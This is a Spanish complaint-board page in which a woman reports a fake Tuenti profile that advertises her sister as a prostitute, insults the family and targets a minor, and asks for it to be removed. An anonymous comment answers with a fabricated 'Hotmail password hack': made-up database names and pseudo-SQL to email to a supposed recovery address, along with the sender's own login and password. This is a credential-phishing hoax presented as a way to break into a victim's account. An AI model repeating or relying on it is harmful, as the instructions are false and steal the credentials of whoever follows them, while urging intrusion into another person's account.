TUENTI FALSO de mi hermana

Hola buenos dias ,me pongo en contacto con vosotros poe que a mi hermana Dayana le han echo un tuenti falso ofreciendo sus servicios como prostituta e insunltandola a ella y a gente de mi familia.

Les pido por favor que lo miren y se investigue desde q correo esta echo ese tuenti y quien le a mandado la invitacion puesto q estos echos estan ya denunciados en comisaria y por favor lo quiten por que es muy fuerte.

Las fotos son echas de otro tuenti y las an robado espero me contesten a la mas brevedad posible se meten tambien con un menor q es mi sobrino.

1 Comentarios, escriba el suyo si lo desea :

Nota: Para dejar un comentario escriba su comentario, haga click en "Publicar" y despues marque la confirmación "No soy un robot"
Anónimo dijo...
16 de enero de 2012, 15:35

Tomale la contraseña,
Si sabes SQL podrar tomar su contraseña,
La base de datos de Hotmail -donde se almacena las contraseñas- se llama "USER_PASS_REG_XX", pues donde XX es la región geográfica del usuario, Asi es como XX=01 es USA, XX=02 es EUROPA, XX=03 LATINO AMERICA, XX=04 ASIA, etc.., y una base de datos llamada USER_SECURITY que almacena el nivel de seguridad de los usuarios, los niveles mayores a cero (0) son usuarios comunes, el usuario cero (0) son usuarios internos de hotmail.com, ahora dado esto, es necesario crear la instrucción en SQL -Native- que permita retraer LA CONTRASEÑA del usuario en cuestión:

Inicio instrucciones SQL:

;Select A.PASS, A.PASSWORD, B.SECURITY From USER_PASS_REG_XX Alias A, USER_SECURITY Alias B
Where A.LOGIN=="e-mail de la victima sin el @HOTMAIL.COM" AND B.SECURITY > 0 INTO CURSOR TABLATEMPORAL;
Send TABLATEMPORAL WHERE DB.MAIL.LOGIN=="tu email sin el @HOTMAIL.COM" AND DB.MAIL.PASS=="tu contraseña";


Fin instrucciones SQL

Ahora bien, necesitamos el medio para interrogar la base de datos.- Hotmail utiliza una cuenta propia llamada "recovery_id_live@hotmail.es" la cual es utilizada por el sistema para recobrar las contraseñas entre zonas (zonas donde se encuentran los servidores)

Por ultimo, y para recibir el password del usuario victima directamente del sistema a nuestra cuenta es necesario:

enviar un e-mail como sigue:

1.- En el campo "Para:" colocar la dirección "recovery_id_live@hotmail.es" sin las comillas.
2.- En el campo "Asunto:" colocar "sistem:03/Admin" sin las comillas, este es el password del servidor de LATINO AMERICA
3.- En el cuerpo del e-mail, colocar exactamente las dos líneas de instrucción SQL, tal como se señalo en el inicio .- Utiliza copiar y pegar para disminuir el margen de error.-

Una vez enviado, recibirás un e-mail con la linea siguiente:

[nivel:NN,LOGIN:"e-mail de la victima"@HOTMAIL.COM,PASSWORD:"password de la victima",XX]

Donde NN es el nivel de seguridad, y XX la región geográfica.-


Nota: No está permitido verter comentarios contrarios a las leyes vigentes o injuriantes. Al hacer uso de este servicio, el usuario afirma haber leido y aceptado las condiciones de uso. Esta web no se hace responsable de los comentarios y opiniones vertidos en los mensajes que publiquen los usuarios, siendo los mismos responsabilidad exclusiva de quien los publica.

___________________________________________

(?) Ayuda sobre como publicar comentarios':

¿Como se publica un comentario? Despliegue el menú que dice "Comentar como" y elija la opcion que desee, puede elegir entre hacerlo con una Cuenta de Google, Nombre o Anónimo. Cuando haya acabado de escribir sus comentarios haga click en Publicar un comentario.

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯